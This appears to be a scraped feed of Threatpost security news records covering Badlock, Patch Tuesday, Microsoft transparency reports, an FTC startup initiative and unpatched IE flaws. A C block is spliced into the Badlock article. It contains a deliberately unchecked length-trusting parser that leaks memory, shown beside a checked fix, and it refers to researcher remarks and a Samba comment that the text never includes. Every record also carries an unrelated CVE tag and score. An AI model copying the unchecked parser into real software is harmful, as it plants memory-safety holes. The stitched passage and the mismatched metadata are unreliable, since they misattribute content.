These are things that would help defenders, but they are missing from the advisory.\u201d\n\nThe [Badlock website](<http://badlock.org/>) isn\u2019t helpful on details either, other than to say that patches will be available for Samba 4.4, 4.3 and 4.2; it cautions that since Samba 4.4.0 was released March 22, Samba 4.1 will no longer be supported.\n\nThe SANS website, meanwhile, cautions that UNIX administrators need to pay attention to the details once they\u2019re made public, and suggests [scanning environments](<https://isc.sans.edu/diary/Getting+Ready+for+Badlock/20877>) for servers with SMB enabled; it\u2019s expected that UNIX implementations would also patch on or around April 12.\n\nIn the meantime, the situation has also stirred up a healthy debate over whether big bugs are being trivialized, not only by self-serving advanced notification, but also by websites and branding with logos.\n\nFrom Badlock.org:\n\n> \u201cThe main goal of this announcement is to give a heads up and to get you ready to patch all systems as fast as possible and have sysadmin resources available on the day the patch will be released. Vendors and distributors of Samba are being informed before a security fix is released in any case. This is part of any Samba security release process.\n> \n> Weighting to the respective interests of advance warning and utmost secrecy we chose to warn you beforehand, so that everyone has a chance to be ready to install the fixes as soon as they are available. Once the patch is released to the public, it will point to attack vectors and exploits will be in the wild in no time.\u201d\n\nMicrosoft has chosen not to add anything to the discussion; a representative told Threatpost: \u201cUnfortunately, Microsoft doesn\u2019t have anything to share.\u201d SerNet CEO Johannes Loxen refused to comment further in an email to Threatpost beyond what is on the badlock.org site. 
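The failure mode the researcher describes above, a parser that believes the length field on the wire, as an added example that is not Samba code and makes no claim about what Badlock actually turns out to be. The layout (a 2-byte big-endian length followed by that many payload bytes), the `struct msg` destination and the 0xCC-filled receive frame are all constructed for the illustration. The lying header is kept below the destination size so the demo runs as an over-read inside a single buffer and stays well-defined; with a declared length above 32 the trusting parser would write past `payload`, which is the overflow the article describes.

```c
/* Added example, not Samba's code: a length field the parser trusts,
 * beside the bounds-checked version. Wire layout is an assumption. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parsed message: fixed-size destination, as a receive path typically has. */
struct msg { uint8_t payload[32]; size_t len; };

static uint16_t rd16be(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Trusting parser: copies exactly as many bytes as the header declares.
 * BUG: declared is never compared with the bytes actually received
 * (pkt_len - 2) or with sizeof out->payload. A header that "lies" upward
 * reads past the packet; one above 32 overflows the destination. */
static int parse_trusting(const uint8_t *pkt, size_t pkt_len, struct msg *out) {
    if (pkt_len < 2) return -1;
    size_t declared = rd16be(pkt);
    memcpy(out->payload, pkt + 2, declared);
    out->len = declared;
    return 0;
}

/* Checked parser: the declared length must fit both what was received and
 * where it is going. Anything else is a malformed (or hostile) packet. */
static int parse_checked(const uint8_t *pkt, size_t pkt_len, struct msg *out) {
    if (pkt_len < 2) return -1;
    size_t declared = rd16be(pkt);
    if (declared > pkt_len - 2) return -1;           /* header lies about length */
    if (declared > sizeof out->payload) return -1;   /* would not fit */
    memcpy(out->payload, pkt + 2, declared);
    out->len = declared;
    return 0;
}

/* Constructed test frame: a 64-byte receive buffer holding an 8-byte packet
 * (2-byte length + 6 payload bytes "ABCDEF"), followed by 0xCC bytes standing
 * in for whatever sat next to it in memory (an earlier client's data, say). */
#define FRAME_LEN 64
#define PKT_LEN 8
static void build_frame(uint8_t *frame, uint16_t declared) {
    memset(frame, 0xCC, FRAME_LEN);
    frame[0] = (uint8_t)(declared >> 8);
    frame[1] = (uint8_t)(declared & 0xFF);
    memcpy(frame + 2, "ABCDEF", 6);
}

/* Honest header (declared == 6): the checked parser accepts, len 6. */
static int demo_honest_len(void) {
    uint8_t frame[FRAME_LEN];
    struct msg m;
    build_frame(frame, 6);
    if (parse_checked(frame, PKT_LEN, &m) != 0) return -1;
    return (int)m.len;
}

/* Lying header (declared == 20 on an 8-byte packet): the trusting parser
 * copies 14 bytes of neighbouring memory into the message. Returns how many
 * 0xCC bytes leaked, i.e. data the sender was never entitled to. */
static int demo_trusting_leaks(void) {
    uint8_t frame[FRAME_LEN];
    struct msg m;
    build_frame(frame, 20);
    if (parse_trusting(frame, PKT_LEN, &m) != 0) return -1;
    int leaked = 0;
    for (size_t i = 0; i < m.len; i++)
        if (m.payload[i] == 0xCC) leaked++;
    return leaked;
}

/* Same lying header against the checked parser: rejected (-1), nothing copied. */
static int demo_checked_rejects(void) {
    uint8_t frame[FRAME_LEN];
    struct msg m;
    build_frame(frame, 20);
    return parse_checked(frame, PKT_LEN, &m);
}

int main(void) {
    printf("honest: %d bytes, trusting parser leaked %d bytes, checked parser: %d\n",
           demo_honest_len(), demo_trusting_leaks(), demo_checked_rejects());
    return 0;
}
```

The two comparisons in `parse_checked` are the whole fix, and they are independent: the first catches a header that disagrees with the bytes on the wire, the second catches a header that is internally consistent but larger than the code was written to hold. A protocol that requires the length to be misstated, as the Samba comment suggests, makes the first check harder to write correctly, which is exactly why such a spot is worth an exploit writer's attention.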
Loxen did concede in a tweet that the advanced notification on the bug is self-serving in terms of marketing and attention toward his company. The tweets have since been deleted.\n\nDan Kaminsky, whose 2008 DNS vulnerability and patch coordination is largely considered the first of its kind, was critical of the hype. He told _Wired_ that this [type of disclosure](<http://www.wired.com/2016/03/hype-around-mysterious-badlock-bug-raises-criticism/>) isn\u2019t helpful to admins. \u201cWhat\u2019s the call to action other than to pay attention?\u201d\n\nAndrew Storms, vice president of security services at New Context, recalled the angst for some around Microsoft\u2019s decision of last January to discontinue Patch Tuesday advanced notification and limit it only to [paying Premier customers](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/>).\n\n\u201cI\u2019ve always been a proponent of the advanced notification. And I was one of the people upset when Microsoft closed up ANS. That few days of heads up gives managers a chance to prep resources,\u201d Storms said. \u201cWhether that\u2019s people or servers or test systems, I\u2019ve always contended that some heads up is better than the big surprise disruption.\u201d\n\nSANS\u2019 Ullrich said advanced notification allows for preparation in areas such as inventories of vulnerable systems, counter measures and configuration options, all of which speed up patching. \n\u201c\u2018Branded\u2019 vulnerabilities are likely patched faster and more organizations will patch them given the attention paid to them (it would be nice to collect some hard numbers on this, but I haven\u2019t seen any studies to that effect yet),\u201d Ullrich said. \u201cOn the other hand, \u2018branded\u2019 vulnerabilities should be reserved for the most severe vulnerabilities. 
In that way, we will have to see if this vulnerability does meet that threshold.\u201d\n", "cvss3": {}, "published": "2016-03-28T11:45:05", "type": "threatpost", "title": "Badlock Bug in Samba SMB Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-12T18:50:16", "id": "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "href": "https://threatpost.com/badlock-vulnerability-clues-few-and-far-between/117008/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:48", "description": "TENERIFE, Spain \u2013 Network defenders who rely solely on lists of assets to protect are running a fool\u2019s errand.\n\nInstead, it\u2019s crucial to think in graphs to not only visualize threats, but also to understand network edges, and dependencies between assets and accounts in order to be able to capture attacker activities and render them useless.\n\nJohn Lambert, general manager of Microsoft\u2019s Threat Intelligence Center, said in today\u2019s keynote address at the Kaspersky Lab Security Analyst Summit that while successful defenders may understand the basic security principles of confidentiality, integrity and availability, they\u2019re interpreting each point on the triad in radically new ways.\n\n\u201cThey\u2019re discarding stuff that doesn\u2019t work,\u201d Lambert said. \u201cAnd stuff they don\u2019t have, they\u2019re inventing it.\u201d\n\nLambert recalled a time not so long ago when defenders were too protective of their intelligence. It was crucial to understand the assets in their environments, develop incident response plans, and view penetration test results as a report card on their internal security\u2014an output. 
Intelligence was rarely shared; for example, analysts weren\u2019t sent to security conferences for fear of \u201cblabbing\u201d threat indicators that might give away a competitive advantage.\n\nModern defenders cannot afford to think that way, Lambert said. One graph he showed mapped dependencies between network edges, accounts and permissions, spreading across the screen like bacteria in a petri dish.\n\n\u201cModern defenders, they have a graph of things to protect,\u201d Lambert said. \u201cThey think about adversaries and their next move. They find trusted peers in the community, and understand the importance of learning from others and their practices. Pen-tests are diagnostics to successful defenders, not a report card. Pen-tests are input, with a goal of increasing attacker requirements.\u201d\n\nLambert shared examples of changes Microsoft has made to core security and detection processes that have eventually made their way into patches and updates that have eliminated scores of zero-days.\n\n\u201cWe are in a world where modern defenders are sharing about adversaries across geographies, industries and even within lines of competition,\u201d Lambert said. \u201cThreats are a common thing we all face. There\u2019s no magical information-sharing thing. It\u2019s a trust-based thing. You have to get to know people, you\u2019re not trading with a vendor, you\u2019re sharing with a person. It\u2019s not a transactional relationship. 
You want to give them indicators because you want them to find more out there and it will help you down the line.\u201d\n\nThe goal should be not only to get attackers off your network and imprison hacker activity, but also to raise the cost of exploit development for attackers.\n\n\u201cYou want to force adversaries to go back to development,\u201d Lambert said, adding that cooperation, even among professional competitors, leads to important research being published, which could awaken others to lend a fresh set of eyes to the problem.\n\n\u201cThe goal should be to remove all of us from a world of information siloes and not sharing, to a world where hacker activity is imprisoned and all their opsec mistakes are trapped and can\u2019t be used anymore,\u201d Lambert said. \u201cKnowledge of intrusion sets grows and grows. This just serves to improve adversary coverage and helps everyone.\u201d\n", "cvss3": {}, "published": "2016-02-08T08:05:53", "type": "threatpost", "title": "Modern Defenders Share, Visualize and Succeed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-02-17T16:28:47", "id": "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "href": "https://threatpost.com/modern-defenders-share-visualize-and-succeed/116181/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:09", "description": "Microsoft launched a new transparency website this week that bundles reports detailing requests for data the company has received, including those from law enforcement, the government, and elsewhere.\n\nThe page, which Microsoft is calling its [Transparency Hub](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/>), is somewhat similar to [what Apple did last month](<https://threatpost.com/apple-goes-all-in-on-privacy/114846/>) when it looped all of its transparency reports together on one page.\n\nWhile Microsoft has issued 
transparency reports regarding requests from law enforcement and the U.S. government in the past, this is the first time it\u2019s broken down requests the company has received from other parties to outright remove content on sites such as its search engine Bing.\n\nLike the other two reports, the \u201c[Content Removal Requests Report](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/crrr/>)\u201d pertains to requests from the first six months of the calendar year. The main difference is this report mostly culls information on requests from other governments, requests from European residents citing a special European Court of Justice ruling, and requests from copyright owners claiming their work was infringed.\n\nAccording to the report, China far and away had the most requests for content to be removed, with 165 requests filed compared to 11 from the United States, and 10 from Austria, Germany, Russia, and the U.K. combined. The report doesn\u2019t specify exactly what the content was or where it was located, but claims the numbers are from Microsoft entities like Bing, OneDrive, and MSN.\n\nThere were many more requests to remove copyrighted information, just north of one million, according to Microsoft. In this case, it was usually URLs that were being shown in Bing searches that contained copyrighted material. Microsoft claims it complied with 92 percent of requests. Since this is an inaugural report, however, there are no statistics from last year to compare the numbers to.\n\nThe company received 3,546 requests from European residents to remove results for queries in Bing that included their name. The European Court of Justice ruling from last year, commonly called the \u2018Right To Be Forgotten\u2019 ruling, allows individuals to ask that results for their name be removed if those results are inadequate, inaccurate or no longer relevant. 
Microsoft complied with 50 percent of those requests.\n\nAs far as law enforcement requests, Microsoft received 35,228, a slight uptick from the second half of 2014 when it received 31,002. The report claims only three percent of requests it received led to the disclosure of content customers created, shared or stored on its services. The company rejected 12 percent of requests, up from 7.5 percent in the second half of last year.\n\nThe company, as it\u2019s done for the past several years, also claims it received somewhere [between zero and 999 National Security Letters](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/fisa/>). The government only permits companies to disclose requests in bands of 1000, which explains the vague number.\n\nThe company got permission to start sharing information pertaining to legal demands they receive in early 2014 but has been posting the reports pertaining to law enforcement twice a year [since 2013](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653/>), largely in response to a growing demand for transparency from big data companies in the post-Snowden world.\n", "cvss3": {}, "published": "2015-10-15T15:32:57", "type": "threatpost", "title": "Latest Microsoft Transparency Report Details Content Removal Requests", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-15T19:32:57", "id": "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "href": "https://threatpost.com/latest-microsoft-transparency-report-details-content-removal-requests/115062/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:10", "description": "Microsoft\u2019s monthly release of security bulletins today is a relatively light load of patches to be tested and deployed. 
The real news, however, could be in a separate advisory in which it continues to deprecate the outdated RC4 stream cipher.\n\nFollowing its initial advisory in May that applied to the .NET framework, today\u2019s move [extends RC4 deprecation](<https://support.microsoft.com/en-us/kb/2978675>) to Windows 10 systems that are running .NET Framework 3.5 applications and systems with .NET Framework 4.6 installed that are running .NET Framework 4.5/4.5.1/4.5.2 applications.\n\nThe advisory also updates the default transport encryption in Windows to TLS 1.2.\n\nThe move is timely as the industry continues to move away from weakened cryptographic algorithms. For example, a recent academic paper projects that the time to arrive at a [practical SHA-1 collision attack](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>) can now be measured in months, not years. Continuous improvements to processing speeds and availability and tweaks to existing attacks put attacks on weak algorithms within reach of well-funded criminal or state-sponsored operations.\n\nAs for today\u2019s half-dozen security bulletins, Microsoft has rated three of them as critical, including the ubiquitous Internet Explorer rollup and patches for remote code execution vulnerabilities in the VBScript and JScript engines in Windows.\n\nFour vulnerabilities are addressed in [MS15-108](<https://technet.microsoft.com/en-us/library/security/MS15-108>), none of which have been publicly disclosed; Microsoft said it is also not aware of public exploits.\n\nMicrosoft said attackers could host an exploit online or phish users with a malicious ActiveX control embedded in an Office document that uses the Internet Explorer rendering engine to redirect users to the malicious website.\n\nThe vulnerabilities affect Vista, Windows Server 2008 and Server Core installations of Windows Server 2008 R2. 
Today\u2019s update patches two separate scripting engine memory corruption vulnerabilities, an information disclosure flaw and an ASLR bypass.\n\n\u201cThe update addresses the vulnerabilities by modifying how the VBScript and JScript scripting engines handle objects in memory, and helping to ensure that affected versions of VBScript properly implement the ASLR security feature,\u201d Microsoft said in its advisory.\n\n\u201cWith the number of JScript and VBscript related vulnerabilities addressed this month, Microsoft needs to adopt a disabled by default strategy with those technologies until they can be removed entirely,\u201d said Core Security systems engineer Bobby Kuzma. \u201cUnfortunately that will never happen, due to the huge legacy application technical debt held by large organizations and governments worldwide.\u201d\n\nMicrosoft also patched 14 vulnerabilities in Internet Explorer and two more in the Microsoft Edge browser for Windows 10 systems.\n\nMost of the IE bulletin, [MS15-106](<https://technet.microsoft.com/library/security/MS15-106>), addresses memory corruption vulnerabilities, along with a handful of privilege elevation and information disclosure flaws. There is also some overlap with the VBScript and JScript bulletin, since IE is the principal attack vector there. 
One of the IE bugs, reported by researchers at FireEye, has been publicly disclosed, but none of the flaws have been exploited in the wild, Microsoft said.\n\nThe Microsoft Edge bulletin, [MS15-107](<https://technet.microsoft.com/library/security/MS15-107>), is rated moderate and takes care of a vulnerability that enables bypass of the browser\u2019s cross-site scripting filter, and a separate information disclosure vulnerability.\n\nThe remaining critical bulletin patches a remote code execution vulnerability in Windows Shell.\n\n\u201cThe vulnerabilities could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online,\u201d Microsoft said in advisory [MS15-109](<https://technet.microsoft.com/library/security/MS15-109>).\n\nThe remaining bulletins are rated important by Microsoft.\n\n[MS15-110](<https://technet.microsoft.com/library/security/MS15-110>) patches three remote code execution vulnerabilities in Microsoft Office, all of which are memory corruption flaws, while [MS15-111](<https://technet.microsoft.com/library/security/MS15-111>) is a Windows kernel update that patches five vulnerabilities, including three different privilege elevation flaws, a memory corruption issue, and a Trusted Boot bypass.\n", "cvss3": {}, "published": "2015-10-13T14:39:57", "type": "threatpost", "title": "October 2015 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-14T20:03:27", "id": "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "href": "https://threatpost.com/microsoft-releases-six-bulletins-continues-rc4-deprecation/115017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:19", "description": "About a decade ago, many large software makers learned some very difficult lessons about software security and 
building security into their products from the start. Some are still learning. The FTC and a variety of security experts are hoping that today\u2019s crop of start-ups will not have to go through that same painful process.\n\nThe FTC is launching a new initiative aimed at start-ups, called [Start With Security](<https://www.ftc.gov/tips-advice/business-center/guidance/start-security-guide-business>), that\u2019s designed to help smaller companies build security into not just their products, but also into their cultures. One of the thrusts of that effort is encouraging companies to begin thinking about the security of their products from the very beginning of the design and development process. This is something that vendors such as Microsoft, Adobe, and many others have been doing for some time.\n\nBut that\u2019s not always because someone inside the company just thought it was a keen idea. In most cases, the changes the software makers made were in response to repeated public attacks on their products and pressure from customers for change. Microsoft is the perfect example. Following a series of major worms that exploited bugs in their products, the company did an about-face on security.\n\n[Window Snyder](<https://threatpost.com/how-i-got-here-window-snyder/114524/>), who was in the security group at Microsoft at the time, said during a panel at an [event](<https://www.ftc.gov/news-events/events-calendar/2015/09/start-security-san-francisco>) sponsored by the FTC in San Francisco Wednesday that the change was an incredibly difficult one for the company.\n\n\u201cThe real motivator for change at Microsoft was a tremendous amount of pain. You guys don\u2019t have to go that route,\u201d said Snyder, who is now the CSO at Fastly.\n\n\u201cThe cost to Microsoft to make those kinds of changes was tremendous. It was a huge challenge for them to try and turn the ship at that point. 
That was a huge cost and you don\u2019t want to do it at the end, you want to do it at the beginning. That\u2019s the time to think about security.\u201d\n\nNot only is the process simpler when you start thinking about security early, it\u2019s far less expensive, the panelists said.\n\n\u201cSecurity is much, much, much cheaper the earlier you do it,\u201d said Devdatta Akhawe, a security engineer at Dropbox. \u201cEither you can plan for security early on and be happy later, or keep fighting and have an expensive battle later on.\u201d\n\nThis is a message that software security experts and many others have been trying to convey to developers and design teams for a long time, with varying levels of success. Many large enterprises, not just commercial software vendors, have adopted secure coding and threat modeling practices and become involved in projects such as [BSIMM](<https://www.bsimm.com>), a software security maturity model.\n\nBut getting the security message across to non-security people can be a difficult process. Frank Kim, CISO of The SANS Institute, said making the risks and rewards real for people is an important aspect of the effort.\n\n\u201cYou have to focus on telling stories. You can\u2019t just go and say, There\u2019s a vulnerability in this line of code and you\u2019re a terrible person,\u201d Kim said. \u201cWe make it tangible and concrete by telling stories about what can happen to your application as a result of that vulnerability.\u201d\n\nThe seriousness of the security problem is not lost on officials at the top of the FTC, which is responsible for investigating and punishing companies that fail to live up to security and privacy standards.\n\n\u201cIn a world where everything is connected, insecure products and services can have severe consequences. 
It’s never been more clear that we must secure the software supporting our digital lives,” FTC Chairwoman Edith Ramirez said in her opening remarks at the event.\n", "cvss3": {}, "published": "2015-09-09T15:03:39", "type": "threatpost", "title": "FTC, Experts Push Startups to Think About Security From the Beginning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-09-09T19:03:39", "id": "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "href": "https://threatpost.com/ftc-experts-push-startups-to-think-about-security-from-the-beginning/114612/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "**UPDATE**–As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren’t enough for organizations to deal with, HP’s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI’s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n“We’re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. 
We continue to monitor the situation and will take appropriate steps to protect our customers,” a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n“The vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document’s elements an attacker can force an Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,” the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n“The specific flaw exists within the handling of CAttrArray objects. By manipulating a document’s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,” the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. 
IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft. _\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). _\n", "cvss3": {}, "published": "2015-07-23T09:14:36", "type": "threatpost", "title": "Four Zero Days Disclosed in Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-28T14:23:41", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "description": "Researchers at HP’s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn’t plan to fix the vulnerabilities, even though the bugs were serious enough to win ZDI’s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn’t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. 
ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn’t plan to patch the remaining bugs because they didn’t affect 64-bit systems.\n\n“In this situation, Microsoft’s statement is technically correct – 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However, what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,” a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n“Since Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. 
We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,” he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "cvss3": {}, "published": "2015-06-22T15:11:28", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-25T21:13:37", "id": "THREATPOST:DC91